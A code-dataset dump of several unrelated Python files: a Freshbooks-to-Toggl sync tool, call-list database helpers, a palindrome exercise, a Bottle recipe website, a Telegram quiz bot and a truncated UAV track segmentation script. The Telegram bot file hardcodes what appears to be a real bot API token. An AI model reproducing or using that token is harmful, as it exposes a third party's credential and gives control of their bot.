pprint\n\ntry:\n import config\nexcept ImportError:\n print(\"Config file config.py.tmpl needs to be copied over to config.py\")\n sys.exit(1)\n\n\nclass TogglAPI(object):\n \"\"\"\n A wrapper for the Toggl API\n\n https://github.com/toggl/toggl_api_docs/blob/master/toggl_api.md\n \"\"\"\n\n def __init__(self, api_token):\n self.api_token = api_token\n\n def _make_url(self, section='time_entries', params={}):\n url = 'https://www.toggl.com/api/v8/{}'.format(section)\n if len(params) > 0:\n url = url + '?{}'.format(urlencode(params))\n return url\n\n def _query(self, url, method, payload=None):\n \"\"\"Performs the actual call to Toggl API\"\"\"\n\n url = url\n headers = {'content-type': 'application/json'}\n\n if method == 'GET':\n return requests.get(url, headers=headers, auth=HTTPBasicAuth(self.api_token, 'api_token'))\n elif method == 'POST':\n return requests.post(url, headers=headers, auth=HTTPBasicAuth(self.api_token, 'api_token'), data=json.dumps(payload))\n else:\n raise ValueError('Undefined HTTP method \"{}\"'.format(method))\n\n def get_workspaces(self):\n \"\"\"Get workspaces for user\"\"\"\n\n url = self._make_url(section='workspaces')\n r = self._query(url=url, method='GET')\n return r.json()\n\n def get_workspace_clients(self, wid):\n \"\"\"Get workspace clients\"\"\"\n # url = self._make_url(section='workspaces', params=)\n r = self._query(url=url, method='GET')\n return r.json()\n\n ## Time Entry functions\n def get_time_entries(self, start_date, end_date):\n \"\"\"Get Time Entries JSON object from Toggl\"\"\"\n\n url = self._make_url(section='time_entries', params={'start_date': start_date.isoformat(), 'end_date': end_date.isoformat()})\n r = self._query(url=url, method='GET')\n return r.json()\n\n def get_hours_tracked(self, start_date, end_date):\n \"\"\"Count the total tracked hours excluding any RUNNING real time tracked time entries\"\"\"\n time_entries = self.get_time_entries(start_date=start_date.isoformat(), end_date=end_date.isoformat())\n\n if time_entries is None:\n return 0\n\n total_seconds_tracked = sum(max(entry['duration'], 0) for entry in time_entries)\n\n return (total_seconds_tracked / 60.0) / 60.0\n\n def get_project_tasks(self, project_id):\n \"\"\"Get project tasks from Toggl\"\"\"\n url = 'https://www.toggl.com/api/v8/projects/%d/tasks' % (project_id,)\n\n r = self._query(url=url, method='GET')\n return r.json()\n\n def get_workspace_projects(self, workspace_id):\n \"\"\"Get workspace projects from Toggl\"\"\"\n url = 'https://www.toggl.com/api/v8/workspaces/%d/projects' % (workspace_id,)\n\n r = self._query(url=url, method='GET')\n return r.json()\n\n def create_time_entry(self, project_id, description, start_date, duration, created_with='Freshbooks to Toggl'):\n # do we convert duration to something usable by Toggl or assume that it will be passed in as seconds?\n data = {\n \"time_entry\": {\n \"description\": description,\n \"pid\": project_id,\n \"start\": start_date.isoformat(),\n \"duration\": duration,\n \"created_with\": created_with\n }\n }\n url = self._make_url(section='time_entries')\n r = self._query(url=url, method='POST', payload=data)\n\n\nclass Freshbooks(object):\n \"\"\"\n Freshbooks API wrapper\n\n using the following code: https://pypi.python.org/pypi/refreshbooks/\n \"\"\"\n def __init__(self):\n self.c = api.TokenClient(\n config.FRESHBOOKS_SITE_DOMAIN,\n config.FRESHBOOKS_API_TOKEN,\n user_agent='Freshbooks to Toggl Sync'\n )\n\n def get_client_list(self):\n client_response = self.c.client.list()\n\n for client in client_response.clients.client:\n print('%s [%d]' % (client.organization, client.client_id))\n\n def get_project_list(self):\n project_response = self.c.project.list()\n\n project_entries = []\n for project in project_response.projects.project:\n project_entries.append({\n 'id': project.project_id,\n 'name': project.name,\n 'description': project.description,\n 'rate': project.rate,\n 'bill_method': project.bill_method,\n 'client_id': project.client_id\n })\n return project_entries\n\n def get_task_list(self, project_id=None):\n task_response = self.c.task.list() if project_id is None else self.c.task.list(project_id=project_id)\n\n task_entries = []\n for task in task_response.tasks.task:\n task_entries.append({\n 'id': task.task_id,\n 'name': task.name,\n 'description': task.description,\n 'billable': (True if task.billable is 1 else False),\n 'rate': task.rate\n })\n return task_entries\n\n def get_time_entry_pagecount(self, project_id, date_from, date_to, task_id=None):\n \"\"\"\n Returns the page count of time entries so we can iterate if needed\n \"\"\"\n time_entries_response = self.c.time_entry.list(\n project_id=project_id,\n date_from=date_from,\n date_to=date_to\n ) if task_id is None else self.c.time_entry.list(\n project_id=project_id,\n task_id=task_id,\n date_from=date_from,\n date_to=date_to\n )\n\n return time_entries_response.time_entries.attrib['pages']\n\n def get_time_entries(self, project_id, date_from, date_to, task_id=None):\n \"\"\"\n Pull back time entries from Freshbooks. Has a default of 25 entries per\n page.\n \"\"\"\n\n page_count = int(self.get_time_entry_pagecount(project_id, date_from, date_to, task_id))\n\n print('Page Count: %d' % page_count)\n time_entries = []\n\n for x in range(1, page_count+1):\n time_entries_response = self.c.time_entry.list(\n project_id=project_id,\n date_from=date_from,\n date_to=date_to,\n page=x\n ) if task_id is None else self.c.time_entry.list(\n project_id=project_id,\n task_id=task_id,\n date_from=date_from,\n date_to=date_to,\n page=x\n )\n\n for time_entry in time_entries_response.time_entries.time_entry:\n time_entries.append({\n 'id': time_entry.time_entry_id,\n 'staff_id': time_entry.staff_id,\n 'project_id': time_entry.project_id,\n 'task_id': time_entry.task_id,\n 'hours': time_entry.hours.pyval,\n 'date': time_entry.date.text,\n 'notes': time_entry.notes.text,\n 'billed': (True if time_entry.billed is 1 else False)\n })\n\n print('Number of time entries: %d' % (len(time_entries)))\n return time_entries\n\n\nclass FreshbooksToToggl(object):\n\n def __init__(self):\n self.freshbooks = Freshbooks()\n self.toggl = TogglAPI(config.TOGGL_API_TOKEN)\n self.pacific = timezone(config.TIMEZONE)\n\n def _convert_hours_to_seconds(self, hours):\n return float(hours) * 60 * 60\n\n def _freshbooks_entry_as_dict(self, freshbooks_entry):\n date_split = freshbooks_entry['date'].split('-')\n start_date = datetime.datetime(int(date_split[0]), int(date_split[1]), int(date_split[2]), 0, 0, 0, 0, tzinfo=self.pacific)\n duration = self._convert_hours_to_seconds(freshbooks_entry['hours'])\n project_id = None\n\n task_id = str(freshbooks_entry['task_id'])\n if task_id in config.F_TO_T_MAPPING:\n project_id = config.F_TO_T_MAPPING[task_id]\n else:\n return None\n\n return {\n \"billed\": freshbooks_entry['billed'],\n \"start_date\": start_date,\n \"duration\": duration,\n \"project_id\": project_id,\n \"description\": freshbooks_entry['notes']\n }\n\n def list_entries(self, start_date, end_date, freshbooks_project_id):\n freshbooks_time_entries = self.freshbooks.get_time_entries(\n project_id=freshbooks_project_id,\n date_from=start_date,\n date_to=end_date\n )\n pprint(freshbooks_time_entries, indent=4)\n\n def list_toggl_tasks(self, project_id):\n task_entries = self.toggl.get_project_tasks(project_id)\n pprint(task_entries, indent=4)\n\n def sync(self, start_date, end_date, freshbooks_project_id, create_entries):\n freshbooks_time_entries = self.freshbooks.get_time_entries(\n project_id=freshbooks_project_id,\n date_from=start_date,\n date_to=end_date\n )\n pprint(freshbooks_time_entries, indent=4)\n \"\"\"\n workspace_id=362157\n # project_list = freshbooks.get_project_list()\n # pprint(project_list, indent=4)\n # task_list = freshbooks.get_task_list(project_id=58)\n # pprint(task_list, indent=4)\n\n toggl_time_entries = toggl.get_time_entries(\n datetime.datetime(2014, 2, 1, 0, 0, 0, 0, tzinfo=pytz.utc),\n datetime.datetime(2014, 2, 15, 0, 0, 0, 0, tzinfo=pytz.utc)\n )\n pprint(toggl_time_entries, indent=4)\n \"\"\"\n\n for fbe in freshbooks_time_entries:\n\n data = self._freshbooks_entry_as_dict(fbe)\n # print(\"Data is: %s\" % data)\n\n pprint(data)\n if data is not None and create_entries:\n self.toggl.create_time_entry(\n project_id=data['project_id'],\n description=data['description'],\n start_date=data['start_date'],\n duration=data['duration']\n )\n # workspace_projects = toggl.get_workspace_projects(X)\n # print json.dumps(workspace_projects, indent=4, sort_keys=True)\n # listinvoices = Freshbooks()\n\n # if args.listinvoices:\n # sbr.sync()\n\n\ndef main():\n parser = argparse.ArgumentParser(prog='freshbooks-to-toggl')\n\n parser.add_argument(\n \"--listinvoices\",\n dest=\"listinvoices\",\n action=\"store_true\"\n )\n\n parser.add_argument(\n \"--from\",\n dest=\"start_date\",\n type=str,\n help=\"Start date of the form YYYY-MM-DD\"\n )\n\n parser.add_argument(\n \"--to\",\n dest=\"end_date\",\n type=str,\n help=\"End date of the form YYYY-MM-DD\"\n )\n\n parser.add_argument(\n \"--project_id\",\n dest=\"project_id\",\n type=int,\n help=\"Freshbooks Project ID\"\n )\n\n parser.add_argument(\n \"--list_entries\",\n dest=\"list_entries\",\n action=\"store_true\"\n )\n\n parser.add_argument(\n \"--toggl-tasks\",\n dest=\"toggl_tasks\",\n action=\"store_true\"\n )\n\n parser.add_argument(\n \"--toggl-project-id\",\n dest=\"toggl_project_id\",\n type=int,\n help=\"Toggl Project ID\"\n )\n\n parser.add_argument(\n \"--sync\",\n dest=\"sync\",\n action=\"store_true\"\n )\n\n args = parser.parse_args()\n\n if args.sync:\n print('Retrieving and posting time entries from: %s to %s' % (args.start_date, args.end_date,))\n fb_to_toggl = FreshbooksToToggl()\n fb_to_toggl.sync(args.start_date, args.end_date, args.project_id, create_entries=True)\n elif args.list_entries:\n fb_to_toggl = FreshbooksToToggl()\n fb_to_toggl.list_entries(args.start_date, args.end_date, args.project_id)\n elif args.toggl_tasks:\n fb_to_toggl = FreshbooksToToggl()\n fb_to_toggl.list_toggl_tasks(args.toggl_project_id)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"kinabalu/freshbooks-to-toggl","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":12214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71909921512","text":"from sqlalchemy.orm import Session\nfrom db.models.call_list import CallList, CallListOverview\n\ndef getRowsBetween(db: Session, start: int, limit: int):\n return db.query(CallList).offset(start).limit(limit).all()\n\ndef getCurrentCallList(db, user): \n current_list_info = getCurrentCallListInfo(db, user.id)\n if current_list_info: \n return db.query(CallList).filter_by(liste_id = current_list_info.liste_id).all()\n else:\n assignNewList(db, user.id)\n current_list_info = getCurrentCallListInfo(db, user.id)\n return db.query(CallList).filter_by(liste_id = current_list_info.liste_id).all()\n\ndef updateCurrentListStatus(db: Session, kunde_id: int):\n overview = db.query(CallListOverview).filter_by(kunde_id = str(kunde_id), er_ferdig = False).first()\n overview.er_ledig = True\n overview.er_ferdig = True\n db.commit()\n\ndef assignNewList(db: Session, kunde_id: int):\n newList = db.query(CallListOverview).filter_by(er_ledig = True, er_ferdig = False).first()\n newList.kunde_id = kunde_id\n newList.er_ledig = False\n db.commit() \n\n\ndef checkIfCurrentLists(db: Session, kunde_id: int ):\n return db.query(CallListOverview).filter_by(kunde_id = str(kunde_id), er_ferdig = False).scalar()\n\n\ndef checkCurrentListStatus(db: Session, kunde_id: int ):\n current_list_info = getCurrentCallListInfo(db, kunde_id)\n overview = db.query(CallListOverview).filter_by(kunde_id = str(kunde_id), er_ferdig = False).first()\n liste_id = overview.liste_id\n current_list = db.query(CallList).filter_by(liste_id = str(liste_id)).all()\n all_unfinished = []\n for i in current_list:\n if i.ringe_status == False:\n all_unfinished.append(i)\n return all_unfinished \n\ndef getCurrentCallListInfo(db: Session, kunde_id: int):\n return db.query(CallListOverview).filter_by(kunde_id = str(kunde_id)).first()\n\ndef updateCallListStatus(db: Session, org_num: int):\n callStatus = db.query(CallList).filter_by(org_num = org_num).first()\n if callStatus.ringe_status:\n callStatus.ringe_status = False\n else:\n callStatus.ringe_status = True\n db.commit()\n\ndef renewList(db: Session, user: int):\n if checkIfCurrentLists(db, user.id):\n if checkCurrentListStatus(db, kunde_id = user.id):\n return False\n updateCurrentListStatus(db, user.id)\n assignNewList(db, user.id)\n return True\n return \"Error, checkIfCurrentLists() failed!\"\n # updateCurrentListStatus(db, user.id)\n\n\n\n\n#! [OLD] NOW SURE IF ITS NEEDED ANYMORE\ndef getOverview(db: Session, user: int):\n if checkIfCurrentLists(db, user.id):\n if checkCurrentListStatus(db, kunde_id = user.id):\n return \"Error, Please finish the current Call list before requesting a new one.\"\n updateCurrentListStatus(db, user.id)\n overview = db.query(CallListOverview).filter_by(er_ledig = True, er_ferdig = False).first()\n overview.er_ledig = False\n overview.kunde_id = user.id \n db.commit()\n return db.query(CallList)[overview.liste_start:overview.liste_limit]#.all()\n","repo_name":"Borgerod/ProSpector","sub_path":"backend/user_backend/fast_api_server/db/repository/call_list.py","file_name":"call_list.py","file_ext":"py","file_size_in_byte":3085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29902394300","text":"'''Is a palindrome\n\nAsk the user to give you five words. Then check if any of the five words is a palindrome.\n\nA palindrome is a word that remains the same whether it's read forward or backward.\n\nExample:\n\n madam is a palindrome.\n so is malayalam.\n But not geeks.\n'''\n'''\nPseudocode\n\n1) Create a function\n2) Ask the user for input (5 words)\n3) For all of the inputs the user gives, check if any of them are palidromes\n'''\n\nif __name__ == '__main__':\n\n list = list()\n\n def is_palindrome(n=5): #create the function\n \"\"\"Checks if a word is a palindrome\"\"\"\n for number in range(n):\n text = input()\n if text[::] == text[::-1]:\n list.append(text)\n\n\n\nis_palindrome()\nprint(list)\n","repo_name":"carrickkv2/Side-Projects","sub_path":"palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72178466153","text":"#!/usr/bin/python\n# -*- encoding: utf-8 -*-\n\n# uvozimo bottle.py\nfrom bottle import *\n\n# uvozimo ustrezne podatke za povezavo\nimport auth_public as auth\n\n# uvozimo psycopg2\nimport psycopg2, psycopg2.extensions, psycopg2.extras, random\npsycopg2.extensions.register_type(psycopg2.extensions.UNICODE) # se znebimo problemov s šumniki\n\n# odkomentiraj, če želiš sporočila o napakah\n# debug(True)\n\n@get('/static/')\ndef static(filename):\n return static_file(filename, root='static') # to je treba spremenit nazaj v samo static\n\n@get('/recept/')\ndef recept(id):\n cur.execute(\"SELECT recept.ime, (SELECT ime FROM uporabnik WHERE uporabnik.id = recept.avtor), \"+\n \"vrsta_jedi, cas_priprave, extract(year FROM datum_objave), extract(month FROM datum_objave)\"+\n \",extract(day FROM datum_objave), navodilo, tezavnost, priloznost.ime, sestavine_objava.vse_skupaj FROM recept \"+\n \"LEFT JOIN primernost ON recept.id=primernost.recept LEFT JOIN sestavine_objava ON recept.id=sestavine_objava.recept LEFT JOIN priloznost ON priloznost.id=primernost.priloznost WHERE recept.id=%s\", [id])\n return template('views/recept2.html', recept=cur)\n\n@get('/')\ndef index():\n cur.execute(\"SELECT recept.ime,uporabnik.ime as avtor,recept.vrsta_jedi,recept.navodilo FROM recept JOIN uporabnik ON recept.avtor=uporabnik.id\")\n return template('views/domov.html', index=cur)\n\n@get('/iskanje')\ndef iskanje_receptov():\n x1 = random.randint(20002, 20400)\n x2 = random.randint(20002, 20400)\n x3 = random.randint(20002, 20400)\n cur.execute(\"SELECT recept.id,recept.ime,recept.avtor,recept.vrsta_jedi,recept.cas_priprave,recept.datum_objave,recept.navodilo,recept.tezavnost FROM recept WHERE recept.id = %s OR recept.id = %s OR recept.id = %s\", (x1, x2, x3))\n return template('views/iskanje_receptov23.html', rand_recepti=cur.fetchmany(3),\n kljucne='', recept='', sestavina='', kategorija='', priloznost='',\n cas='', tezavnost='', napaka=None, prvic=True)\n\n@post('/iskanje')\ndef iskanje_receptov_post():\n pogoji = []\n pogoji = [(k, o, v) for k, o, v in [('recept.navodilo', 'ILIKE', request.forms.kljucne),\n ('recept.ime', 'ILIKE', request.forms.recept),\n ('recept.vrsta_jedi', '=', request.forms.kategorija),\n ('priloznost.ime', '=', request.forms.priloznost),\n ('sestavina.ime', '=', request.forms.sestavina),\n ('recept.cas_priprave', '=',\n request.forms.cas[:request.forms.cas.index(' ')] if ' ' in request.forms.cas else ''),\n ('recept.tezavnost', '=', request.forms.tezavnost)]\n if v != ''] # (ime stolpca, operator, podatek)\n print('PPPPOGOJI?', pogoji)\n where = ''\n where = ' AND '.join('{} {} {}'.format(k, o, \"'%%'||%s||'%%'\" if 'LIKE' in o else '%s')\n for k, o, v in pogoji) # pri (I)LIKE iščemo podniz\n if where != '': # če imamo kak pogoj, dodamo WHERE\n where = 'WHERE {}'.format(where)\n print(where)\n print('WHERE {}'.format(where))\n podatki = [v for k, o, v in pogoji]\n cur.execute(\"\"\"\n SELECT recept.id, recept.ime, uporabnik.ime AS avtor, recept.vrsta_jedi,\n recept.cas_priprave, recept.datum_objave, recept.navodilo, recept.tezavnost\n FROM recept JOIN uporabnik ON recept.avtor = uporabnik.id\n JOIN potrebuje ON recept.id = potrebuje.recept\n JOIN sestavina ON sestavina.id = potrebuje.sestavina\n LEFT JOIN primernost ON recept.id = primernost.recept\n LEFT JOIN priloznost ON primernost.priloznost = priloznost.id\n {}\"\"\".format(where), podatki)\n return template('views/iskanje_receptov23.html', prvic=False,rand_recepti=cur.fetchall(),\n kljucne='', recept='', sestavina='', kategorija='', priloznost='',\n cas='', tezavnost='', napaka=None)\n \n@get('/uporabnik')\ndef uporabniki():\n cur.execute(\"SELECT * FROM uporabnik\")\n return template('views/uporabnik2.html', uporabnik=cur)\n\n##@get('/prijava')\n##def prijava():\n## return template('views/prijava2.html', napaka=None)\n##\n##@post('/prijava')\n##def prijava_registracija():\n## upIme1 = request.forms.upIme1\n## geslo = request.forms.geslo\n## upIme2 = request.forms.upIme2\n## geslo1 = request.forms.geslo1\n## geslo2 = request.forms.geslo2\n## if upIme2=='':\n## try:\n## cur.execute(\"SELECT id,ime FROM uporabnik WHERE ime=%s\",[upIme1])\n## uporabnik=cur\n## for (id,ime) in uporabnik:\n## cur.execute(\"SELECT * FROM geslo WHERE id=%s\",[id])\n## uporabnik=cur\n## for (id,ime,geslo0) in uporabnik:\n## if ime==upIme1 and geslo==geslo0:\n## prijavljen = True\n## if prijavljen:\n## napaka = 'Uspešno ste prijavljeni!'\n## return template('views/domov.html')\n## else:\n## napaka = 'Prijava neuspešna!'\n## return template('views/prijava2.html',napaka = napaka)\n## print(prijavljen)\n## \n## except Exception as ex:\n## return template('views/prijava2.html', upIme1=upIme1, geslo=geslo,\n## napaka = 'Zgodila se je napaka: %s' % ex, prijavljen=prijavljen)\n## elif upIme1=='':\n## if geslo1==geslo2:\n## try:\n## cur.execute(\"INSERT INTO uporabnik (ime, opis) VALUES (%s,'Začetnik,')\",[upIme2])\n## cur.execute(\"SELECT * FROM uporabnik WHERE ime=%s\",[upIme2])\n## uporabnik=cur\n## for (id,ime,datum,opis) in uporabnik:\n## cur.execute(\"INSERT INTO geslo (id, ime, geslo) VALUES (%s,%s,%s)\",[id,upIme2,geslo1])\n## return template('views/prijava2.html')\n## except Exception as ex:\n## if ex=='no results to fetch':\n## napaka = ''\n## else:\n## napaka ='Zgodila se je napaka: %s' % ex\n## print(ex)\n## return template('views/prijava2.html', upIme2=upIme2, geslo1=geslo1, geslo2=geslo2,\n## napaka = napaka)\n## redirect(\"/\")\n\n@get('/midva')\ndef midva():\n return template('views/midva.html')\n\n@get('/dodaj_recept')\ndef dodaj_receot():\n return template('views/dodajanje.html', ime='', sestavine='', kategorija='', priloznost='',\n cas='', tezavnost='')\n\n@get('/vsi_recepti')\ndef vsi_recepti():\n cur.execute(\"SELECT id,ime, navodilo FROM recept\")\n return template('views/vsi_recepti.html', vsi=cur)\n\n@get('/rezultati_iskanja')\ndef vsi_recepti():\n cur.execute(\"SELECT id,ime, navodilo FROM recept\")\n return template('views/rezultati.html', vsi=cur)\n\n@get('/odjava')\ndef odjavi():\n return template('views/odjava.html')\n\n@post('/po_odjavi')\ndef odjavi():\n cur.execute(\"SELECT recept.ime,uporabnik.ime as avtor,recept.vrsta_jedi,recept.navodilo FROM recept JOIN uporabnik ON recept.avtor=uporabnik.id\")\n return template('views/domov.html', index=cur)\n\n@get('/dodajanje')\ndef vnesi_recept():\n return template('views/hvala.html')\n\n@get('/hvala')\ndef dodaj_recept():\n # Zaradi časovne stiske nedokončana funkcija. Želela sva sicer omogočiti uporabnikom dodajanje receptov v bazo,\n # ampak trenutno ta možnost ne deluje.\n return template('views/hvala.html')\n \n######################################################################\n# Glavni program\n\n# priklopimo se na bazo\nconn = psycopg2.connect(database=auth.db, host=auth.host, user=auth.user, password=auth.password)\nconn.set_isolation_level(psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT) # onemogočimo transakcije\ncur = conn.cursor(cursor_factory=psycopg2.extras.DictCursor) \n\n# poženemo strežnik na portu 8080, glej http://localhost:8080/\nrun(host='localhost', port=8080)\nprint(666)\n","repo_name":"tjasabajc/Recepti","sub_path":"projekt.py","file_name":"projekt.py","file_ext":"py","file_size_in_byte":8152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41020037772","text":"import logging\r\nimport asyncio\r\nfrom aiogram import Bot, Dispatcher, executor, types\r\n\r\nAPI_TOKEN = '5758456770:AAHr6S-MCN_Nqfg7ppvOePHoUuMmYmrFXoo'\r\n\r\n# Configure logging\r\nlogging.basicConfig(level=logging.INFO)\r\n\r\n# Initialize bot and dispatcher\r\nbot = Bot(token=API_TOKEN)\r\ndp = Dispatcher(bot)\r\n\r\n\r\n@dp.message_handler(commands=['start', 'help'])\r\nasync def send_welcome(message: types.Message):\r\n await message.reply(\"Salom!\\nI'm TESTBot!\\nPowered by aiogram.\")\r\n\r\n\r\n@dp.message_handler(text=\"test\")\r\nasync def echo(message: types.Message):\r\n await message.answer_poll(\r\n question=\"Mars IT schoolning nechta filiyali bor?\",\r\n options=[\"1\", '2', '3'],\r\n correct_option_id=2,\r\n type=\"quiz\",\r\n is_anonymous=False,\r\n open_period=10\r\n ),\r\n await asyncio.sleep(10)\r\n await message.answer_poll(\r\n question=\"Mars IT schoolda BACK-351DA nechta o'quvchi bor?\",\r\n options=[\"10\", '6', '17'],\r\n correct_option_id=1,\r\n type=\"quiz\",\r\n is_anonymous=False,\r\n open_period=10\r\n ),\r\n await asyncio.sleep(10)\r\n await message.answer_poll(\r\n question=\"Mars IT da nechta kurs bor?\",\r\n options=[\"bekent\", 'frontent', 'stater', 'Hammasi bor'],\r\n correct_option_id=3,\r\n type=\"quiz\",\r\n is_anonymous=False,\r\n open_period=10\r\n ),\r\n await asyncio.sleep(10)\r\n await message.answer_poll(\r\n question=\"Mars IT da necta coinga keyboard olasiz?\",\r\n options=[\"150\", '350', '500'],\r\n correct_option_id=1,\r\n type=\"quiz\",\r\n is_anonymous=False,\r\n open_period=10\r\n )\r\n\r\n\r\n\r\n@dp.message_handler()\r\nasync def echo(message: types.Message):\r\n await message.answer(\"Any text\")\r\n\r\n\r\nif __name__ == '__main__':\r\n executor.start_polling(dp, skip_updates=True)","repo_name":"Muhammadali-01/HOTEL_PYTON_CODES","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20087334901","text":"################################\n# This script is the main script of the UAV Track Classification project.\n# 0. Include all requirements\n# 1. Configure the flags\n# 2. Configure the input and output paths\n# 3. Run the script\n# \n# @author: David Sanchez \n# @author: Daniel Amigo \n################################\n\n#############################################################\n# IMPORTS #\n#############################################################\nimport math\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split # To split the data into train and test\nfrom os.path import isfile, join # To use the data files\nimport os\nimport imblearn # To balance the data\nimport psutil # To copy files \nimport multiprocessing # for parallelization\nimport pathlib\nimport shutil\n##### Algorithms to import #####\nimport segmentationAlgorithms as segmentation # segmentationAlgorithms.py - To segment the data \n\n#############################################################\n# FLAGS #\n#############################################################\n#activate processes flags\nprocessResampling_Beforesegments = True # Resampling before segments extraction \nprocessResampling_Aftersegments = False # \nprocessSegmentation = \"SQUISHE\" # \ncompressionRate = 1/100 # \nminCompressionLen = 10 # \nparalelize = True # \nnumThreads = 16 # Number of threads to use\n# Output flags\ndebug = False\nsavePartialInputs = True\n\n#############################################################\n# PATHS #\n#############################################################\n#Input PATHS\ninputPath = os.path.join(pathlib.Path(__file__).parent.parent.absolute(), \"Data\" , \"Segmentation\",\"Input\") # PATH to the folder with input data\ntracksDir = \"SingleTrackFiles\" # PATH to the sub-folder with input tracks\ninstancesCSVFile = 'Dataset final.csv' # File with the list of instances to be processed\n#Output PATHS\noutputPath = os.path.join(pathlib.Path(__file__).parent.parent.absolute(), \"Data\" , \"Segmentation\") # PATH to the folder with output data\ndividedThreadsDir = \"DividedThreads\" # PATH to the folder to generate output data\nresamplingSegmentsDir = \"ResamplingSegmentOutput\" # PATH to the sub-folder with pre-processed inputs\nresamplingTracksDir = \"ResamplingTracksOutput\" # PATH to the sub-folder with pre-processed inputs\nsegmentationDir = \"SegmentationOutput\" # PATH to the sub-folder with pre-processed inputs\n\n#############################################################\n# FUNCTIONS #\n#############################################################\n# *****************************************************************************************\n# ** Load data stored in a csv file\n# ******* INPUT: CSV file path\n# ******* OUTPUT: Dataframe with the data\n# *****************************************************************************************\ndef loadDataCSV(CSVList):\n csv = pd.read_csv(CSVList,sep=',')\n if debug:\n print(\"trajectory loaded\")\n csv\n return csv\n\n#####################################\n# This function extracts the trajectory summary from the ulog file\ndef extractSegmentSummary(track=None, segmentStart=None, segmentEnd=None):\n segmentStart = int(segmentStart)\n segmentEnd = int(segmentEnd)\n \n # initialize variables to store the summary\n # calculate duration in seconds\n duration = (track.timestamp[segmentEnd] - track.timestamp[segmentStart]) / 1000000 \n numPoints = segmentEnd - segmentStart\n distanceXY_sum = 0\n distanceZ_sum = 0\n speedXY_sum = 0\n speedZ_sum = 0\n\n # iterate over all data\n for i in range(segmentStart, segmentEnd):\n if i != 0:\n distanceXY_sum += math.sqrt((track.x[i] - track.x[i-1])**2 + (track.y[i] - track.y[i-1])**2)\n distanceZ_sum += abs(track.z[i] - track.z[i-1])\n speedXY_sum += math.sqrt((track.x[i] - track.x[i-1])**2 + (track.y[i] - track.y[i-1])**2) / (track.timestamp[i] - track.timestamp[i-1])\n speedZ_sum += abs(track.z[i] - track.z[i-1]) / (track.timestamp[i] - track.timestamp[i-1])\n # Calculate speed average\n speedXY_sum = speedXY_sum / numPoints\n speedZ_sum = speedZ_sum / numPoints\n return duration, numPoints, distanceXY_sum, distanceZ_sum, speedXY_sum, speedZ_sum\n\n# *****************************************************************************************\n# Segment the tracks\n# ******* INPUT: tracksDir: path to the folder with the tracks\n# ******* INPUT: outputPath: path to the folder to store the segments and its summary\n# ******* INPUT: flag to indicate if segmentation can be applied\n# ******* INPUT: thread_id: thread number\n# ******* INPUT: tracks: list of tracks to be processed \n# ******* INPUT: models: drone model for each track\n# ******* OUTPUT: segmentAlgorithm: CSV file with the dataframe including the segments extracted from the tracks\n# *****************************************************************************************\ndef segmentationProcess(tracksDir, outputPath, thread_id, tracks, models, segmentAlgorithm=\"SQUISHE\", debug=False):\n # Remove output folder if exists and create it again\n #if os.path.exists(outputPath):\n # shutil.rmtree(outputPath) \n if not os.path.exists(outputPath):\n os.makedirs(outputPath)\n\n tracks=tracks.reset_index(drop=True)\n models=models.reset_index(drop=True)\n if debug:\n print(\"thread_id\")\n print(thread_id)\n df_segments = pd.DataFrame(\n columns=[\n 'UAV_Airframe',\n 'track_id',\n 'segmentStart',\n 'segmentEnd',\n 'seg_id',\n 'num_segments',\n 'duration',\n 'numPoints',\n 'distanceXY',\n 'distanceZ',\n 'speedXY',\n 'speedZ'\n ]\n ) \n\n # for each track in x_train and model in y_train\n if debug:\n print(tracks)\n for i in range(len(tracks)): # for each track\n try:\n currentDroneModel = models[i] # Get drone model name\n trackFile = tracks[i]+\".csv\"\n trackID = tracks[i]\n except:\n print(f\"Error reading file number {i} of {len(tracks)}\")\n\n # Print the percentage of tracks processed each 10 tracks\n if i%10==0:\n print(\"Thread \"+str(thread_id)+\" has processed \"+str(i)+\" tracks of \"+str(len(tracks))+\" (\"+str(round(i/len(tracks)*100,2))+\"%)\")\n\n pathCSVSegments = os.path.join(outputPath, f\"segments_{thread_id}.csv\")\n\n try:\n # Read file\n trackPathFile = join(tracksDir,trackFile)\n if isfile(trackPathFile):\n df = pd.read_csv(trackPathFile,sep=',') \n \n # Select segmentation algorithm\n if segmentAlgorithm==\"SQUISHE\":\n indexList=segmentation.SQUISHE(df, compressionRate, minCompressionLen,thread_id,debug) #create segments\n else:\n pass # TO EXPAND IN THE FUTURE\n \n # On each segment, store on a CSV file its data\n segmentID=0\n for i in range(len(indexList)-1):\n segmentStart = indexList.iloc[i]['index']\n segmentEnd = indexList.iloc[i+1]['index']\n duration, numPoints, distanceXY, distanceZ, speedXY, speedZ = \\\n extractSegmentSummary(track=df, segmentStart=segmentStart, segmentEnd=segmentEnd)\n\n # Create a new dataframe with the segment data\n new_segment = pd.DataFrame(\n columns=[\n 'UAV_Airframe',\n 'track_id',\n 'segmentStart',\n 'segmentEnd',\n 'seg_id',\n 'num_segments',\n 'duration',\n 'numPoints',\n 'distanceXY',\n 'distanceZ',\n 'speedXY',\n 'speedZ'\n ]\n )\n new_segment.at[0,'UAV_Airframe'] = currentDroneModel\n new_segment.at[0,'track_id'] = trackID\n new_segment.at[0,'segmentStart'] = segmentStart\n new_segment.at[0,'segmentEnd'] = segmentEnd\n new_segment.at[0,'seg_id'] = i\n new_segment.at[0,'num_segments'] = len(indexList)-1\n new_segment.at[0,'duration'] = duration \n new_segment.at[0,'numPoints'] = numPoints\n new_segment.at[0,'distanceXY'] = distanceXY\n new_segment.at[0,'distanceZ'] = distanceZ\n new_segment.at[0,'speedXY'] = speedXY\n new_segment.at[0,'speedZ'] = speedZ\n \n segmentID=segmentID+1\n\n # Add the new segment to the list of segments\n df_segments=pd.concat([df_segments, new_segment], ignore_index=True)\n\n # Save the new segment on the file of 